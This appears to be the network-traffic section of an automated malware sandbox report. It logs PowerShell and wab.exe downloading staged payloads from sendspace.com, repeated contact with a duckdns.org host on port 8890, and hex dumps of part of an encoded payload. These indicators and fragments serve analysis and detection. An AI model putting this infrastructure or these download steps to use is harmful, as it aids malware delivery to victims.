                                                                          May 23, 2024 21:02:07.354672909 CEST88906279812.202.180.134192.168.2.5
                                                                          May 23, 2024 21:02:07.651535034 CEST88906279812.202.180.134192.168.2.5
                                                                          May 23, 2024 21:02:07.694920063 CEST627988890192.168.2.512.202.180.134
                                                                          May 23, 2024 21:02:07.770037889 CEST88906279812.202.180.134192.168.2.5
                                                                          May 23, 2024 21:02:07.819951057 CEST627988890192.168.2.512.202.180.134
                                                                          May 23, 2024 21:02:07.825247049 CEST627988890192.168.2.512.202.180.134
                                                                          May 23, 2024 21:02:07.884416103 CEST88906279812.202.180.134192.168.2.5
                                                                          May 23, 2024 21:02:07.884489059 CEST627988890192.168.2.512.202.180.134
                                                                          May 23, 2024 21:02:07.890095949 CEST88906279812.202.180.134192.168.2.5
                                                                          May 23, 2024 21:02:21.570908070 CEST627988890192.168.2.512.202.180.134
                                                                          May 23, 2024 21:02:21.575922966 CEST88906279812.202.180.134192.168.2.5
                                                                          May 23, 2024 21:02:21.575982094 CEST627988890192.168.2.512.202.180.134
                                                                          May 23, 2024 21:02:21.580954075 CEST88906279812.202.180.134192.168.2.5
                                                                          May 23, 2024 21:02:21.874382973 CEST88906279812.202.180.134192.168.2.5
                                                                          May 23, 2024 21:02:21.929332018 CEST627988890192.168.2.512.202.180.134
                                                                          May 23, 2024 21:02:22.006546974 CEST88906279812.202.180.134192.168.2.5
                                                                          May 23, 2024 21:02:22.009210110 CEST627988890192.168.2.512.202.180.134
                                                                          May 23, 2024 21:02:22.014138937 CEST88906279812.202.180.134192.168.2.5
                                                                          May 23, 2024 21:02:22.014240026 CEST627988890192.168.2.512.202.180.134
                                                                          May 23, 2024 21:02:22.019165039 CEST88906279812.202.180.134192.168.2.5
                                                                          May 23, 2024 21:02:25.914474010 CEST627988890192.168.2.512.202.180.134
                                                                          May 23, 2024 21:02:25.919461012 CEST88906279812.202.180.134192.168.2.5
                                                                          May 23, 2024 21:02:25.919519901 CEST627988890192.168.2.512.202.180.134
                                                                          May 23, 2024 21:02:25.924351931 CEST88906279812.202.180.134192.168.2.5
                                                                          May 23, 2024 21:02:26.209712982 CEST88906279812.202.180.134192.168.2.5
                                                                          May 23, 2024 21:02:26.257396936 CEST627988890192.168.2.512.202.180.134
                                                                          May 23, 2024 21:02:26.350087881 CEST88906279812.202.180.134192.168.2.5
                                                                          May 23, 2024 21:02:26.351001024 CEST627988890192.168.2.512.202.180.134
                                                                          May 23, 2024 21:02:26.355880976 CEST88906279812.202.180.134192.168.2.5
                                                                          May 23, 2024 21:02:26.355947971 CEST627988890192.168.2.512.202.180.134
                                                                          May 23, 2024 21:02:26.361004114 CEST88906279812.202.180.134192.168.2.5
                                                                          May 23, 2024 21:02:28.366588116 CEST88906279812.202.180.134192.168.2.5
                                                                          May 23, 2024 21:02:28.413645983 CEST627988890192.168.2.512.202.180.134
                                                                          May 23, 2024 21:02:28.512669086 CEST88906279812.202.180.134192.168.2.5
                                                                          May 23, 2024 21:02:28.554291964 CEST627988890192.168.2.512.202.180.134

                                                                          UDP Packets

                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          May 23, 2024 21:00:25.915752888 CEST5518453192.168.2.51.1.1.1
                                                                          May 23, 2024 21:00:25.934050083 CEST53551841.1.1.1192.168.2.5
                                                                          May 23, 2024 21:00:27.137149096 CEST6420753192.168.2.51.1.1.1
                                                                          May 23, 2024 21:00:27.195399046 CEST53642071.1.1.1192.168.2.5
                                                                          May 23, 2024 21:00:53.395682096 CEST5362090162.159.36.2192.168.2.5
                                                                          May 23, 2024 21:00:53.993345976 CEST6295153192.168.2.51.1.1.1
                                                                          May 23, 2024 21:00:54.044219971 CEST53629511.1.1.1192.168.2.5
                                                                          May 23, 2024 21:01:01.280939102 CEST5526153192.168.2.51.1.1.1
                                                                          May 23, 2024 21:01:01.293365002 CEST53552611.1.1.1192.168.2.5
                                                                          May 23, 2024 21:01:02.079384089 CEST5356253192.168.2.51.1.1.1
                                                                          May 23, 2024 21:01:02.135396004 CEST53535621.1.1.1192.168.2.5
                                                                          May 23, 2024 21:01:06.137931108 CEST5099353192.168.2.51.1.1.1
                                                                          May 23, 2024 21:01:06.759708881 CEST53509931.1.1.1192.168.2.5

                                                                          DNS Queries

                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                          May 23, 2024 21:00:25.915752888 CEST192.168.2.51.1.1.10x781cStandard query (0)www.sendspace.comA (IP address)IN (0x0001)false
                                                                          May 23, 2024 21:00:27.137149096 CEST192.168.2.51.1.1.10xc2aeStandard query (0)fs03n4.sendspace.comA (IP address)IN (0x0001)false
                                                                          May 23, 2024 21:00:53.993345976 CEST192.168.2.51.1.1.10x2fdeStandard query (0)198.187.3.20.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                                          May 23, 2024 21:01:01.280939102 CEST192.168.2.51.1.1.10xca49Standard query (0)www.sendspace.comA (IP address)IN (0x0001)false
                                                                          May 23, 2024 21:01:02.079384089 CEST192.168.2.51.1.1.10x123dStandard query (0)fs03n3.sendspace.comA (IP address)IN (0x0001)false
                                                                          May 23, 2024 21:01:06.137931108 CEST192.168.2.51.1.1.10x3aa6Standard query (0)xvern429.duckdns.orgA (IP address)IN (0x0001)false

                                                                          DNS Answers

                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                          May 23, 2024 21:00:25.934050083 CEST1.1.1.1192.168.2.50x781cNo error (0)www.sendspace.com172.67.170.105A (IP address)IN (0x0001)false
                                                                          May 23, 2024 21:00:25.934050083 CEST1.1.1.1192.168.2.50x781cNo error (0)www.sendspace.com104.21.28.80A (IP address)IN (0x0001)false
                                                                          May 23, 2024 21:00:27.195399046 CEST1.1.1.1192.168.2.50xc2aeNo error (0)fs03n4.sendspace.com69.31.136.17A (IP address)IN (0x0001)false
                                                                          May 23, 2024 21:00:54.044219971 CEST1.1.1.1192.168.2.50x2fdeName error (3)198.187.3.20.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                                          May 23, 2024 21:01:01.293365002 CEST1.1.1.1192.168.2.50xca49No error (0)www.sendspace.com172.67.170.105A (IP address)IN (0x0001)false
                                                                          May 23, 2024 21:01:01.293365002 CEST1.1.1.1192.168.2.50xca49No error (0)www.sendspace.com104.21.28.80A (IP address)IN (0x0001)false
                                                                          May 23, 2024 21:01:02.135396004 CEST1.1.1.1192.168.2.50x123dNo error (0)fs03n3.sendspace.com69.31.136.17A (IP address)IN (0x0001)false
                                                                          May 23, 2024 21:01:06.759708881 CEST1.1.1.1192.168.2.50x3aa6No error (0)xvern429.duckdns.org12.202.180.134A (IP address)IN (0x0001)false

                                                                          HTTP Request Dependency Graph

                                                                          • www.sendspace.com
                                                                          • fs03n4.sendspace.com
                                                                          • fs03n3.sendspace.com

                                                                          HTTPS Proxied Packets

                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          0192.168.2.549704172.67.170.1054436100C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-05-23 19:00:26 UTC174OUTGET /pro/dl/7yi2fu HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Host: www.sendspace.com
                                                                          Connection: Keep-Alive
                                                                          2024-05-23 19:00:27 UTC950INHTTP/1.1 301 Moved Permanently
                                                                          Date: Thu, 23 May 2024 19:00:27 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Set-Cookie: SID=07ckflbanm4t2u2skdk925fl56; path=/; domain=.sendspace.com
                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                          Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                          Pragma: no-cache
                                                                          Location: https://fs03n4.sendspace.com/dlpro/c40ece74e11005d648325f5972143ae4/664f924b/7yi2fu/Jordbrets243.sea
                                                                          Vary: Accept-Encoding
                                                                          CF-Cache-Status: DYNAMIC
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AUUp7yRwXBYJkZxhDDZalhVhPLtDx3VgUYA3OfZx%2FI1ZEK9gK%2BvrlK2RiV%2BiwbnWFUSdy6lyk15oo%2FuaYh0U1bcCdxvdU%2FjIfMVVa7kEwReYQD%2FYlWjXoepRHOY1%2BgsVptp9Ow%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 888749f21e7dc352-EWR
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          2024-05-23 19:00:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          1192.168.2.54970569.31.136.174436100C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-05-23 19:00:27 UTC235OUTGET /dlpro/c40ece74e11005d648325f5972143ae4/664f924b/7yi2fu/Jordbrets243.sea HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Host: fs03n4.sendspace.com
                                                                          Connection: Keep-Alive
                                                                          2024-05-23 19:00:28 UTC501INHTTP/1.1 200 OK
                                                                          Server: nginx
                                                                          Date: Thu, 23 May 2024 19:00:27 GMT
                                                                          Content-Type: application/octet-stream
                                                                          Content-Length: 417828
                                                                          Last-Modified: Mon, 20 May 2024 13:17:23 GMT
                                                                          Connection: close
                                                                          Set-Cookie: SID=qrfpagkuoh6662bbsuco3tf2o2; path=/; domain=.sendspace.com
                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                          Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                          Content-Disposition: attachment;filename="Jordbrets243.sea"
                                                                          ETag: "664b4d63-66024"
                                                                          Accept-Ranges: bytes
                                                                          2024-05-23 19:00:28 UTC15883INData Raw: 63 51 47 62 63 51 47 62 75 32 6a 69 45 77 42 78 41 5a 74 78 41 5a 73 44 58 43 51 45 36 77 49 4e 50 4f 73 43 32 42 75 35 5a 71 65 30 2b 58 45 42 6d 2b 73 43 61 56 4b 42 36 59 57 2b 79 39 72 72 41 6c 43 51 63 51 47 62 67 65 6e 68 36 4f 67 65 36 77 4c 2b 41 2b 73 43 32 77 37 72 41 73 36 68 36 77 49 38 33 37 6f 67 54 76 2b 4c 36 77 4c 6e 6c 48 45 42 6d 33 45 42 6d 2b 73 43 67 64 49 78 79 6e 45 42 6d 33 45 42 6d 34 6b 55 43 2b 73 43 57 6f 35 78 41 5a 76 52 34 75 73 43 50 4f 62 72 41 6b 70 67 67 38 45 45 36 77 4a 33 67 65 73 43 54 61 32 42 2b 56 68 77 6e 41 46 38 79 6e 45 42 6d 33 45 42 6d 34 74 45 4a 41 52 78 41 5a 74 78 41 5a 75 4a 77 2b 73 43 4b 76 74 78 41 5a 75 42 77 36 35 65 70 41 44 72 41 6c 4a 66 36 77 49 32 4e 4c 72 44 49 68 72 56 36 77 4c 55 68 6e 45
                                                                          Data Ascii: cQGbcQGbu2jiEwBxAZtxAZsDXCQE6wINPOsC2Bu5Zqe0+XEBm+sCaVKB6YW+y9rrAlCQcQGbgenh6Oge6wL+A+sC2w7rAs6h6wI837ogTv+L6wLnlHEBm3EBm+sCgdIxynEBm3EBm4kUC+sCWo5xAZvR4usCPObrAkpgg8EE6wJ3gesCTa2B+VhwnAF8ynEBm3EBm4tEJARxAZtxAZuJw+sCKvtxAZuBw65epADrAlJf6wI2NLrDIhrV6wLUhnE
                                                                          2024-05-23 19:00:28 UTC16384INData Raw: 39 69 34 49 6d 41 49 51 59 4d 6b 68 37 5a 55 4b 7a 69 4e 74 5a 75 41 55 37 78 6b 46 66 4e 38 6b 70 72 57 52 43 76 4f 30 63 57 4c 67 46 4e 50 74 64 2f 59 56 6a 50 63 51 66 66 46 59 75 35 4b 76 57 30 61 61 70 50 66 53 55 49 62 74 6e 4e 39 34 31 35 32 78 49 49 59 43 33 4f 62 41 79 39 4d 63 38 37 56 76 34 6e 31 50 55 59 34 55 73 48 72 4e 65 6a 30 6f 6a 56 34 43 33 47 44 6a 4f 50 42 4d 46 6c 38 47 56 41 34 53 4d 35 4c 6a 47 6a 63 4e 56 66 4b 45 43 65 6f 53 6b 7a 35 6b 70 69 68 45 67 6a 49 5a 44 74 35 67 44 78 33 4a 39 59 4a 63 31 51 41 2b 50 38 32 54 7a 59 33 43 62 57 6f 34 59 36 61 37 65 46 56 76 74 33 5a 63 41 79 2b 4f 4f 2f 43 4e 78 64 62 45 31 51 36 64 4b 48 4d 58 73 53 56 71 71 68 50 66 35 34 59 73 4d 74 4f 44 61 50 4c 55 5a 4f 63 77 38 45 77 56 36 34 44
                                                                          Data Ascii: 9i4ImAIQYMkh7ZUKziNtZuAU7xkFfN8kprWRCvO0cWLgFNPtd/YVjPcQffFYu5KvW0aapPfSUIbtnN94152xIIYC3ObAy9Mc87Vv4n1PUY4UsHrNej0ojV4C3GDjOPBMFl8GVA4SM5LjGjcNVfKECeoSkz5kpihEgjIZDt5gDx3J9YJc1QA+P82TzY3CbWo4Y6a7eFVvt3ZcAy+OO/CNxdbE1Q6dKHMXsSVqqhPf54YsMtODaPLUZOcw8EwV64D
                                                                          2024-05-23 19:00:28 UTC16384INData Raw: 61 6a 31 6b 69 6a 66 66 42 2f 66 79 37 65 69 33 78 69 39 44 47 57 31 35 64 6d 75 4b 45 34 44 32 2b 42 57 55 52 67 58 6d 55 77 77 6c 36 5a 30 4b 38 48 39 6b 79 45 49 54 67 50 62 34 46 5a 56 6c 79 49 65 52 35 4f 58 70 6e 51 72 77 4b 34 62 71 35 42 57 58 4c 4f 5a 6c 6c 51 72 7a 4a 77 64 6d 64 2b 45 71 4f 57 71 43 73 65 7a 59 41 44 66 4c 6f 6f 6c 65 78 2f 75 31 4a 6a 70 39 73 77 43 43 4b 51 64 34 74 74 57 35 6b 2b 61 4c 72 55 56 33 5a 37 74 6a 59 2b 34 46 70 79 42 34 57 72 73 6e 78 57 64 2f 4d 63 78 4f 46 71 76 36 32 5a 6b 4c 75 76 30 37 75 71 65 33 6b 67 4f 31 78 44 6d 55 39 39 31 4b 70 57 51 72 6b 71 4b 4f 64 41 55 49 31 42 30 6d 2b 67 7a 69 52 65 44 69 57 50 38 6e 42 4a 65 53 46 76 41 56 6b 51 6b 72 47 76 63 5a 4a 62 56 33 6a 46 41 43 54 68 63 70 6a 6b 6f
                                                                          Data Ascii: aj1kijffB/fy7ei3xi9DGW15dmuKE4D2+BWURgXmUwwl6Z0K8H9kyEITgPb4FZVlyIeR5OXpnQrwK4bq5BWXLOZllQrzJwdmd+EqOWqCsezYADfLoolex/u1Jjp9swCCKQd4ttW5k+aLrUV3Z7tjY+4FpyB4WrsnxWd/McxOFqv62ZkLuv07uqe3kgO1xDmU991KpWQrkqKOdAUI1B0m+gziReDiWP8nBJeSFvAVkQkrGvcZJbV3jFACThcpjko
                                                                          2024-05-23 19:00:28 UTC16384INData Raw: 31 6d 45 42 41 76 41 58 65 4d 47 61 77 4e 6b 32 38 45 6a 35 43 76 4e 69 78 2f 67 4d 34 41 7a 6e 6c 77 4e 46 71 35 48 49 6f 57 6f 44 72 53 33 56 56 48 57 74 2f 76 70 48 4f 70 43 6d 64 35 4b 6c 70 53 41 45 57 50 63 62 63 72 4b 34 4a 4e 2f 6a 49 6e 78 77 76 50 66 66 65 68 79 31 7a 35 4b 68 7a 57 34 31 5a 37 5a 6e 73 6f 37 30 55 2b 48 74 69 64 57 65 4d 6c 73 6a 36 73 32 49 4c 67 65 35 4d 78 63 41 38 32 6f 53 65 32 74 39 63 34 59 76 6d 68 49 34 58 78 32 46 75 65 32 53 4f 2b 47 65 2b 42 57 55 32 35 46 54 63 63 59 7a 62 61 63 4e 4e 7a 76 78 6c 39 49 53 55 52 61 77 77 58 4d 4e 4e 56 75 39 70 6a 6f 53 55 6d 6d 44 69 4b 73 75 46 6d 6e 4c 33 34 38 2f 6d 30 58 30 73 47 45 7a 70 58 31 50 32 51 79 61 39 57 69 63 6f 67 37 61 7a 6a 39 55 7a 6c 36 41 65 6b 36 77 78 43 6d
                                                                          Data Ascii: 1mEBAvAXeMGawNk28Ej5CvNix/gM4AznlwNFq5HIoWoDrS3VVHWt/vpHOpCmd5KlpSAEWPcbcrK4JN/jInxwvPffehy1z5KhzW41Z7Znso70U+HtidWeMlsj6s2ILge5MxcA82oSe2t9c4YvmhI4Xx2Fue2SO+Ge+BWU25FTccYzbacNNzvxl9ISURawwXMNNVu9pjoSUmmDiKsuFmnL348/m0X0sGEzpX1P2Qya9Wicog7azj9Uzl6Aek6wxCm
                                                                          2024-05-23 19:00:28 UTC16384INData Raw: 54 52 70 72 50 58 67 52 6c 51 73 6e 78 4a 69 51 35 31 77 50 48 62 38 4a 6d 48 50 34 6b 71 37 52 2b 34 65 52 78 76 33 79 35 4c 54 30 32 41 4a 35 6e 4c 75 47 44 37 72 38 46 51 72 77 46 35 4c 68 78 69 56 70 37 73 34 6f 45 79 4c 38 46 50 38 4f 50 36 68 36 31 4f 44 32 32 74 48 35 6d 6f 73 63 61 42 47 56 43 44 4e 51 39 58 7a 32 41 77 30 4f 38 42 51 54 39 6b 4d 6e 6b 39 78 6f 45 5a 55 4a 6e 46 4c 50 57 53 38 4d 6b 4a 36 31 53 35 4f 38 61 42 47 56 43 65 34 55 32 50 7a 31 34 45 57 36 49 42 57 56 4e 4f 44 47 42 76 55 4d 39 69 77 46 44 69 4d 4e 44 76 41 55 51 74 2f 2f 75 64 4c 35 4e 4c 2f 73 32 4d 4c 72 2f 37 45 57 72 77 65 2b 5a 73 57 66 49 65 77 5a 69 34 37 78 54 41 38 64 30 68 42 67 79 4f 72 42 6c 51 72 4f 42 66 38 6d 2f 42 65 52 78 64 73 5a 46 6c 44 30 32 67 64
                                                                          Data Ascii: TRprPXgRlQsnxJiQ51wPHb8JmHP4kq7R+4eRxv3y5LT02AJ5nLuGD7r8FQrwF5LhxiVp7s4oEyL8FP8OP6h61OD22tH5moscaBGVCDNQ9Xz2Aw0O8BQT9kMnk9xoEZUJnFLPWS8MkJ61S5O8aBGVCe4U2Pz14EW6IBWVNODGBvUM9iwFDiMNDvAUQt//udL5NL/s2MLr/7EWrwe+ZsWfIewZi47xTA8d0hBgyOrBlQrOBf8m/BeRxdsZFlD02gd
                                                                          2024-05-23 19:00:28 UTC16384INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 49 57 61 69 6a 33 47 36 43
                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIWaij3G6C
                                                                          2024-05-23 19:00:28 UTC16384INData Raw: 53 52 50 45 69 72 69 54 53 31 4f 2b 4f 2b 4d 6d 39 42 57 57 4f 36 55 38 57 51 4a 6a 59 6a 58 65 4d 32 58 35 51 77 6c 2f 2b 41 69 33 2b 55 50 6f 70 44 75 59 52 54 4f 46 6f 6e 6f 56 55 4b 30 33 30 46 75 79 36 37 37 35 47 50 36 39 41 35 4c 48 64 4e 47 6a 4e 50 66 62 2b 34 64 56 50 35 4c 46 6c 36 78 4c 43 37 5a 6e 73 6f 37 30 63 2b 43 53 46 78 52 6c 61 6f 30 5a 65 4e 32 47 4c 36 42 78 34 6a 51 47 6b 53 36 43 6c 75 56 78 35 43 76 42 2f 61 35 38 37 35 69 45 65 62 4b 34 39 67 64 5a 2f 67 61 34 62 4f 64 34 2b 52 37 77 4e 5a 55 49 31 6d 4c 6c 44 76 41 58 73 67 65 2b 4f 2b 4a 36 39 42 57 55 51 42 6a 4a 36 63 38 65 45 6c 37 6c 35 62 4d 2f 44 54 70 6a 70 39 76 79 45 70 31 46 30 46 67 76 4c 68 6b 4c 71 65 78 7a 70 64 43 2b 4d 4e 31 56 4b 4a 73 72 46 36 2f 4a 66 44 57
                                                                          Data Ascii: SRPEiriTS1O+O+Mm9BWWO6U8WQJjYjXeM2X5Qwl/+Ai3+UPopDuYRTOFonoVUK030Fuy6775GP69A5LHdNGjNPfb+4dVP5LFl6xLC7Znso70c+CSFxRlao0ZeN2GL6Bx4jQGkS6CluVx5CvB/a5875iEebK49gdZ/ga4bOd4+R7wNZUI1mLlDvAXsge+O+J69BWUQBjJ6c8eEl7l5bM/DTpjp9vyEp1F0FgvLhkLqexzpdC+MN1VKJsrF6/JfDW
                                                                          2024-05-23 19:00:28 UTC16384INData Raw: 59 41 61 4a 41 33 33 65 31 38 7a 30 33 36 67 55 57 48 65 47 49 68 4e 54 6b 63 4c 2b 34 57 4e 76 61 67 4c 7a 44 6c 70 54 74 42 59 78 6a 58 4a 4a 37 67 50 56 44 76 41 55 39 59 77 6c 6d 58 5a 73 39 73 50 56 44 76 41 58 64 66 68 53 73 35 4d 63 73 42 47 56 43 6c 57 33 4f 46 74 72 79 70 48 48 64 68 4e 44 53 76 51 56 6c 53 44 72 4e 65 38 64 39 52 35 72 50 4c 41 52 6c 51 73 6e 79 4a 34 57 2b 33 70 4a 48 6b 54 32 32 77 34 36 49 4d 4b 2f 61 68 45 39 32 56 31 78 7a 78 6e 53 45 56 77 63 68 6f 75 37 47 5a 59 7a 6f 36 4c 30 46 5a 63 5a 31 76 48 45 5a 64 70 6e 6b 67 34 62 49 52 78 41 39 39 4a 67 6c 6d 61 76 6b 73 77 74 4b 72 51 4b 39 7a 2b 37 50 46 67 52 6c 51 6e 73 48 34 76 49 4f 78 2b 52 6f 34 59 74 6a 51 44 6e 65 35 47 67 6c 73 67 4f 41 50 54 66 66 66 31 55 44 58 59
                                                                          Data Ascii: YAaJA33e18z036gUWHeGIhNTkcL+4WNvagLzDlpTtBYxjXJJ7gPVDvAU9YwlmXZs9sPVDvAXdfhSs5McsBGVClW3OFtrypHHdhNDSvQVlSDrNe8d9R5rPLARlQsnyJ4W+3pJHkT22w46IMK/ahE92V1xzxnSEVwchou7GZYzo6L0FZcZ1vHEZdpnkg4bIRxA99JglmavkswtKrQK9z+7PFgRlQnsH4vIOx+Ro4YtjQDne5GglsgOAPTfff1UDXY
                                                                          2024-05-23 19:00:28 UTC16384INData Raw: 45 72 77 63 52 69 68 30 4d 6b 30 4a 55 2f 44 6f 78 53 46 66 36 59 71 64 42 37 58 70 77 2b 4c 4a 77 79 51 37 33 68 51 6d 77 5a 59 68 5a 6f 63 65 73 61 47 41 46 46 4b 49 7a 75 30 68 42 39 37 71 4d 2f 4f 61 74 58 57 35 4a 33 4e 6e 4e 4d 73 34 38 30 70 53 76 55 71 79 64 77 58 73 56 6f 6b 56 38 5a 74 59 42 36 37 72 68 47 42 50 48 35 4c 58 67 4a 37 71 70 50 63 4a 4e 79 6a 50 54 4e 74 34 31 35 6d 78 35 49 54 79 58 4d 4c 63 62 35 45 32 47 37 79 49 52 6e 61 4b 5a 5a 35 39 6c 49 67 72 77 58 51 2f 47 53 6c 37 6b 75 50 77 36 78 47 7a 6a 68 47 49 38 38 49 4f 50 77 35 4f 66 2b 5a 68 45 68 47 49 32 55 4b 57 76 6a 70 79 4f 65 37 70 6e 35 6e 79 46 68 61 55 4a 7a 33 54 76 4a 69 4e 39 30 6d 49 4d 38 6e 59 6e 53 44 33 54 58 63 52 37 51 6d 48 79 56 73 31 42 77 38 73 42 4f 78
                                                                          Data Ascii: ErwcRih0Mk0JU/DoxSFf6YqdB7Xpw+LJwyQ73hQmwZYhZocesaGAFFKIzu0hB97qM/OatXW5J3NnNMs480pSvUqydwXsVokV8ZtYB67rhGBPH5LXgJ7qpPcJNyjPTNt415mx5ITyXMLcb5E2G7yIRnaKZZ59lIgrwXQ/GSl7kuPw6xGzjhGI88IOPw5Of+ZhEhGI2UKWvjpyOe7pn5nyFhaUJz3TvJiN90mIM8nYnSD3TXcR7QmHyVs1Bw8sBOx
                                                                          2024-05-23 19:00:28 UTC16384INData Raw: 59 78 4f 53 31 33 57 79 59 76 44 33 79 38 7a 48 41 5a 65 53 74 4c 54 50 32 53 4f 32 5a 37 4b 4f 39 50 50 67 6b 4f 63 4d 66 52 58 7a 55 2f 69 56 51 57 64 76 69 34 31 7a 47 32 4e 45 77 5a 30 6a 61 72 44 36 61 35 59 53 61 49 42 34 6a 4a 78 30 44 6b 49 50 4e 43 73 6b 65 54 41 53 77 33 49 79 31 53 65 51 6c 7a 68 38 35 73 4e 53 35 5a 55 34 66 6e 57 4a 54 46 59 74 4a 53 55 63 2f 30 5a 48 76 62 44 6c 2f 73 73 32 4b 6b 54 6d 63 4c 6b 57 35 68 56 7a 65 6d 56 54 63 55 56 41 6e 39 38 4e 39 52 5a 54 56 2b 34 53 55 48 77 63 70 50 63 4e 56 43 77 44 55 50 56 4c 35 79 31 73 4d 61 74 2b 45 78 42 5a 4c 62 69 45 4f 33 56 4d 2f 57 58 66 70 7a 6a 4d 52 57 75 43 51 78 33 52 61 35 62 2b 48 58 4f 53 31 36 44 4f 4c 46 65 36 2f 48 4c 46 37 6c 4f 53 77 32 33 32 68 63 6a 33 33 65 38
                                                                          Data Ascii: YxOS13WyYvD3y8zHAZeStLTP2SO2Z7KO9PPgkOcMfRXzU/iVQWdvi41zG2NEwZ0jarD6a5YSaIB4jJx0DkIPNCskeTASw3Iy1SeQlzh85sNS5ZU4fnWJTFYtJSUc/0ZHvbDl/ss2KkTmcLkW5hVzemVTcUVAn98N9RZTV+4SUHwcpPcNVCwDUPVL5y1sMat+ExBZLbiEO3VM/WXfpzjMRWuCQx3Ra5b+HXOS16DOLFe6/HLF7lOSw232hcj33e8


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          2192.168.2.562796172.67.170.1054436120C:\Program Files (x86)\Windows Mail\wab.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-05-23 19:01:01 UTC175OUTGET /pro/dl/lt00vw HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Host: www.sendspace.com
                                                                          Cache-Control: no-cache
                                                                          2024-05-23 19:01:02 UTC955INHTTP/1.1 301 Moved Permanently
                                                                          Date: Thu, 23 May 2024 19:01:02 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Set-Cookie: SID=ns2pmla9s88ipijkujilaccdr6; path=/; domain=.sendspace.com
                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                          Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                          Pragma: no-cache
                                                                          Location: https://fs03n3.sendspace.com/dlpro/9b8d52bb1f23ea7f2c058fa6bd7b21b2/664f926d/lt00vw/jXoEkwyvRCuipiJXijfHFGP97.bin
                                                                          Vary: Accept-Encoding
                                                                          CF-Cache-Status: DYNAMIC
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=s1rvw93%2B5CdFwDjk23556I69LP27Qb2FGujG2YCthXgppBa3mRlaufTCWFMVReo8MM9I%2BH332MQ48moE56LsXWdr5A5NyeJY289bCJswTkvlK8sfTYuez25nfRQDSi%2BuIzMZLA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 88874acef97d198e-EWR
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          2024-05-23 19:01:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          3192.168.2.56279769.31.136.174436120C:\Program Files (x86)\Windows Mail\wab.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-05-23 19:01:02 UTC313OUTGET /dlpro/9b8d52bb1f23ea7f2c058fa6bd7b21b2/664f926d/lt00vw/jXoEkwyvRCuipiJXijfHFGP97.bin HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Cache-Control: no-cache
